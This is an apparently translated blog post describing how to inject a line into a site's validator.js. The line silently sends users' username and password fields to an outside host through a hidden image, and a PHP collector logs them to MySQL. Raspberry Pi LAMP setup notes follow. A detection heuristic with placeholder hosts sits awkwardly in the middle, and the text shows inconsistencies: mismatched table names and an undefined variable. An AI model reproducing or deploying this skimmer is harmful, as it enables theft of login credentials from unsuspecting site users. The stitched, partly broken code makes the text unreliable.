Where the XSS code is placed
Path: /Include/Script/validator.js
Function location: form.submit, under jQuery.fn.checkForm
JS code: document.getElementById('mx').src="http://www.sherpper.com:8680/test.php?"+encodeURI('pass=' + document.getElementById('TextBox2').value)+encodeURI('&user=' + document.getElementById('TextBox1').value);
Two functions were used while constructing the code: escape and encodeURI.
Note that a URL built with escape cannot be submitted successfully; encodeURI has to be used.
HTML code: <img src="" id="mx" style="display: none;"/>
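Seen from the defending side, the line added to validator.js has a recognizable shape: a URL-bearing property (src) is assigned a string that combines an absolute URL on a foreign host with reads of input .value fields. The following is an added example, not code from the original post, of a review-time heuristic that flags that shape in served scripts; ALLOWED_HOSTS, the hostnames intranet.example and collector.example, and the sample script are constructed for illustration.

```javascript
// Added example (not from the original page): flag script lines that send
// form-field values to a host outside an allowlist through src/href/action.
// ALLOWED_HOSTS and every hostname below are constructed placeholders.
const ALLOWED_HOSTS = new Set(["intranet.example"]);

// Sink: assignment (not comparison) to a property that triggers a request.
const SINK = /\.(src|href|action)\s*=(?!=)/;
// Source: reads of user input or session data.
const SOURCE = /\.value\b|\.val\(\s*\)|document\.cookie/;
// Absolute or protocol-relative URL literal; captures the host without port.
const URL_HOST = /["'](?:https?:)?\/\/([^\/"':?#]+)/gi;

// Hosts referenced on a line that are not on the allowlist.
function externalHosts(line) {
  const hosts = [];
  for (const m of line.matchAll(URL_HOST)) {
    const host = m[1].toLowerCase();
    if (!ALLOWED_HOSTS.has(host)) hosts.push(host);
  }
  return hosts;
}

// Return one finding per line where sink, source and foreign host coincide.
function scanScript(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((line, i) => {
    if (!SINK.test(line) || !SOURCE.test(line)) return;
    const hosts = externalHosts(line);
    if (hosts.length) findings.push({ line: i + 1, hosts });
  });
  return findings;
}

// Constructed sample: line 3 has the shape of the injected line on this page.
const SAMPLE = [
  `form.submit(function () {`,
  `  document.getElementById('logo').src = "http://intranet.example/img/logo.png";`,
  `  document.getElementById('mx').src = "http://collector.example:8680/test.php?" + encodeURI('pass=' + document.getElementById('TextBox2').value);`,
  `  var ok = document.getElementById('TextBox1').value !== "";`,
  `  document.getElementById('f').action = "//intranet.example/login?u=" + document.getElementById('TextBox1').value;`,
  `});`,
].join("\n");

console.log(JSON.stringify(scanScript(SAMPLE))); // [{"line":3,"hosts":["collector.example"]}]
```

A heuristic like this complements, and does not replace, file-integrity monitoring of served scripts and a Content-Security-Policy whose img-src excludes unknown hosts.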
Install MySQL and create the database
Create the database
Create database test;
Create the table
create table login
(
id int not null AUTO_INCREMENT,
username char(15) NOT NULL,
password char(15) NOT NULL,
PRIMARY KEY(id)
)ENGINE = InnoDB;
To view the table created earlier
show create table xss;
PHP back-end receiving code
<?php
session_start();
$_SESSION['attempt'] = isset($_SESSION['attempt'])?$_SESSION['attempt']:0;
$_SESSION['attempt'] += 1;
if ($_SESSION['attempt'] >= 100) {
    die("Too Frequent");
}
$mysqli = new mysqli("localhost", "root", "123456", "evil");
if ($mysqli->connect_errno) {
    echo "Failed to connect to MySQL: (" . $mysqli->connect_errno . ") " . $mysqli->connect_error;
}
$passwd = $_GET['pass'];
$users = $_GET['user'];
$time = date("Y-m-d H:i:s", time());
$items = explode(";", $content);
$js = '';
foreach ($items as $item) {
    $js .= ("document.cookie='".trim($item)."';");
}
echo 'js: ' , $js , '<br>' , 'time: ' , $time , '<br>';
if ($stmt = $mysqli->prepare("insert into xss(username, password, time, js) values (?, ?, ?, ?)")) {
    $stmt->bind_param('ssss', $passwd, $users, $time, $js);
    $result = $stmt->execute();
    if ($result) {
        echo "Collected Your Cookie <br>" ;
    }
}
echo 'password: ', $passwd, '<br>', 'username: ', $users;
?>
I ran into a few small problems while deploying the LAMP server on Linux this time:
Environment: Debian 7 (Raspberry Pi), Apache2, PHP, MySQL
After configuring port.conf, a problem appeared on restart:
How to fix Apache2 could not reliably determine the server’s fully qualified domain name
The fix is below, with the link attached:
echo "ServerName localhost" | sudo tee /etc/apache2/conf.d/fqdn